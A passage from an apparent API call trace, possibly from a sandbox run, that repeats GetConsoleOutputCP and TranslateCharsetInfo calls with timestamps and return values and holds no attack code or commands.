lpCs=0xb156f8d0d8) returned 0 [0156.807] GetConsoleOutputCP () returned 0x1b5 [0156.807] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.808] GetConsoleOutputCP () returned 0x1b5 [0156.808] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.808] GetConsoleOutputCP () returned 0x1b5 [0156.808] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.808] GetConsoleOutputCP () returned 0x1b5 [0156.808] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.808] GetConsoleOutputCP () returned 0x1b5 [0156.809] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.809] GetConsoleOutputCP () returned 0x1b5 [0156.809] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.809] GetConsoleOutputCP () returned 0x1b5 [0156.809] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.809] GetConsoleOutputCP () returned 0x1b5 [0156.810] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.810] GetConsoleOutputCP () returned 0x1b5 [0156.810] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.810] GetConsoleOutputCP () returned 0x1b5 [0156.810] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.810] GetConsoleOutputCP () returned 0x1b5 [0156.811] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.811] GetConsoleOutputCP () returned 0x1b5 [0156.811] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.811] GetConsoleOutputCP () returned 0x1b5 [0156.811] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.811] GetConsoleOutputCP () returned 0x1b5 [0156.811] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.811] GetConsoleOutputCP () returned 0x1b5 [0156.812] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.812] GetConsoleOutputCP () returned 0x1b5 [0156.812] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.812] GetConsoleOutputCP () returned 0x1b5 [0156.812] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.812] GetConsoleOutputCP () returned 0x1b5 [0156.813] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.813] GetConsoleOutputCP () returned 0x1b5 [0156.813] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.813] GetConsoleOutputCP () returned 0x1b5 [0156.813] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.813] GetConsoleOutputCP () returned 0x1b5 [0156.813] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.814] GetConsoleOutputCP () returned 0x1b5 [0156.814] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.814] GetConsoleOutputCP () returned 0x1b5 [0156.814] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.814] GetConsoleOutputCP () returned 0x1b5 [0156.814] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.814] GetConsoleOutputCP () returned 0x1b5 [0156.815] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.815] GetConsoleOutputCP () returned 0x1b5 [0156.815] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.815] GetConsoleOutputCP () returned 0x1b5 [0156.815] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.815] GetConsoleOutputCP () returned 0x1b5 [0156.816] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.816] GetConsoleOutputCP () returned 0x1b5 [0156.816] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.816] GetConsoleOutputCP () returned 0x1b5 [0156.816] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.816] GetConsoleOutputCP () returned 0x1b5 [0156.816] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.816] GetConsoleOutputCP () returned 0x1b5 [0156.817] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.817] GetConsoleOutputCP () returned 0x1b5 [0156.817] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.817] GetConsoleOutputCP () returned 0x1b5 [0156.817] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.817] GetConsoleOutputCP () returned 0x1b5 [0156.818] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.818] GetConsoleOutputCP () returned 0x1b5 [0156.818] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.818] GetConsoleOutputCP () returned 0x1b5 [0156.818] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.818] GetConsoleOutputCP () returned 0x1b5 [0156.818] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.819] GetConsoleOutputCP () returned 0x1b5 [0156.819] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.819] GetConsoleOutputCP () returned 0x1b5 [0156.819] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.819] GetConsoleOutputCP () returned 0x1b5 [0156.819] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.819] GetConsoleOutputCP () returned 0x1b5 [0156.820] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.820] GetConsoleOutputCP () returned 0x1b5 [0156.820] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.820] GetConsoleOutputCP () returned 0x1b5 [0156.820] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.820] GetConsoleOutputCP () returned 0x1b5 [0156.821] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.821] GetConsoleOutputCP () returned 0x1b5 [0156.821] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.821] GetConsoleOutputCP () returned 0x1b5 [0156.821] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.821] GetConsoleOutputCP () returned 0x1b5 [0156.821] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.821] GetConsoleOutputCP () returned 0x1b5 [0156.822] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.822] GetConsoleOutputCP () returned 0x1b5 [0156.822] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.822] GetConsoleOutputCP () returned 0x1b5 [0156.822] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.822] GetConsoleOutputCP () returned 0x1b5 [0156.823] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.823] GetConsoleOutputCP () returned 0x1b5 [0156.823] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.823] GetConsoleOutputCP () returned 0x1b5 [0156.823] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.823] GetConsoleOutputCP () returned 0x1b5 [0156.823] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.824] GetConsoleOutputCP () returned 0x1b5 [0156.824] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.824] GetConsoleOutputCP () returned 0x1b5 [0156.824] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.824] GetConsoleOutputCP () returned 0x1b5 [0156.827] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.827] GetConsoleOutputCP () returned 0x1b5 [0156.827] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.827] GetConsoleOutputCP () returned 0x1b5 [0156.827] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.827] GetConsoleOutputCP () returned 0x1b5 [0156.828] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.828] GetConsoleOutputCP () returned 0x1b5 [0156.828] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.828] GetConsoleOutputCP () returned 0x1b5 [0156.828] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.828] GetConsoleOutputCP () returned 0x1b5 [0156.829] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.829] GetConsoleOutputCP () returned 0x1b5 [0156.829] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.829] GetConsoleOutputCP () returned 0x1b5 [0156.829] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.829] GetConsoleOutputCP () returned 0x1b5 [0156.829] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.829] GetConsoleOutputCP () returned 0x1b5 [0156.830] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.830] GetConsoleOutputCP () returned 0x1b5 [0156.830] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.830] GetConsoleOutputCP () returned 0x1b5 [0156.830] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.830] GetConsoleOutputCP () returned 0x1b5 [0156.831] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.831] GetConsoleOutputCP () returned 0x1b5 [0156.831] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.831] GetConsoleOutputCP () returned 0x1b5 [0156.831] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.831] GetConsoleOutputCP () returned 0x1b5 [0156.831] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.832] GetConsoleOutputCP () returned 0x1b5 [0156.832] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.832] GetConsoleOutputCP () returned 0x1b5 [0156.832] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.832] GetConsoleOutputCP () returned 0x1b5 [0156.833] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.833] GetConsoleOutputCP () returned 0x1b5 [0156.833] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.833] GetConsoleOutputCP () returned 0x1b5 [0156.833] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.833] GetConsoleOutputCP () returned 0x1b5 [0156.833] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.834] GetConsoleOutputCP () returned 0x1b5 [0156.834] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.834] GetConsoleOutputCP () returned 0x1b5 [0156.834] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.834] GetConsoleOutputCP () returned 0x1b5 [0156.834] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.834] GetConsoleOutputCP () returned 0x1b5 [0156.835] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.835] GetConsoleOutputCP () returned 0x1b5 [0156.835] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.835] GetConsoleOutputCP () returned 0x1b5 [0156.835] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.835] GetConsoleOutputCP () returned 0x1b5 [0156.836] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.836] GetConsoleOutputCP () returned 0x1b5 [0156.836] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.836] GetConsoleOutputCP () returned 0x1b5 [0156.836] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.836] GetConsoleOutputCP () returned 0x1b5 [0156.836] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.837] GetConsoleOutputCP () returned 0x1b5 [0156.837] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.837] GetConsoleOutputCP () returned 0x1b5 [0156.837] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.837] GetConsoleOutputCP () returned 0x1b5 [0156.837] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.837] GetConsoleOutputCP () returned 0x1b5 [0156.838] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.838] GetConsoleOutputCP () returned 0x1b5 [0156.838] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.838] GetConsoleOutputCP () returned 0x1b5 [0156.838] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.838] GetConsoleOutputCP () returned 0x1b5 [0156.839] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.839] GetConsoleOutputCP () returned 0x1b5 [0156.839] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.839] GetConsoleOutputCP () returned 0x1b5 [0156.839] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.839] GetConsoleOutputCP () returned 0x1b5 [0156.839] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.839] GetConsoleOutputCP () returned 0x1b5 [0156.840] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.840] GetConsoleOutputCP () returned 0x1b5 [0156.840] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.840] GetConsoleOutputCP () returned 0x1b5 [0156.841] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.841] GetConsoleOutputCP () returned 0x1b5 [0156.841] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.841] GetConsoleOutputCP () returned 0x1b5 [0156.841] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.841] GetConsoleOutputCP () returned 0x1b5 [0156.841] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.841] GetConsoleOutputCP () returned 0x1b5 [0156.842] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.842] GetConsoleOutputCP () returned 0x1b5 [0156.842] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.842] GetConsoleOutputCP () returned 0x1b5 [0156.842] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.842] GetConsoleOutputCP () returned 0x1b5 [0156.843] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.843] GetConsoleOutputCP () returned 0x1b5 [0156.843] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.843] GetConsoleOutputCP () returned 0x1b5 [0156.843] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.843] GetConsoleOutputCP () returned 0x1b5 [0156.843] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.844] GetConsoleOutputCP () returned 0x1b5 [0156.844] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.844] GetConsoleOutputCP () returned 0x1b5 [0156.844] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.844] GetConsoleOutputCP () returned 0x1b5 [0156.844] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.844] GetConsoleOutputCP () returned 0x1b5 [0156.845] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.845] GetConsoleOutputCP () returned 0x1b5 [0156.845] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.845] GetConsoleOutputCP () returned 0x1b5 [0156.845] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.845] GetConsoleOutputCP () returned 0x1b5 [0156.846] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.846] GetConsoleOutputCP () returned 0x1b5 [0156.846] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.846] GetConsoleOutputCP () returned 0x1b5 [0156.846] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.846] GetConsoleOutputCP () returned 0x1b5 [0156.846] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0xb156f8d0d8) returned 0 [0156.847] GetConsoleOutputCP () returned 0x1b5 [0156.847] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0xb156f8d0d8, dwFlags=0x2 | out: 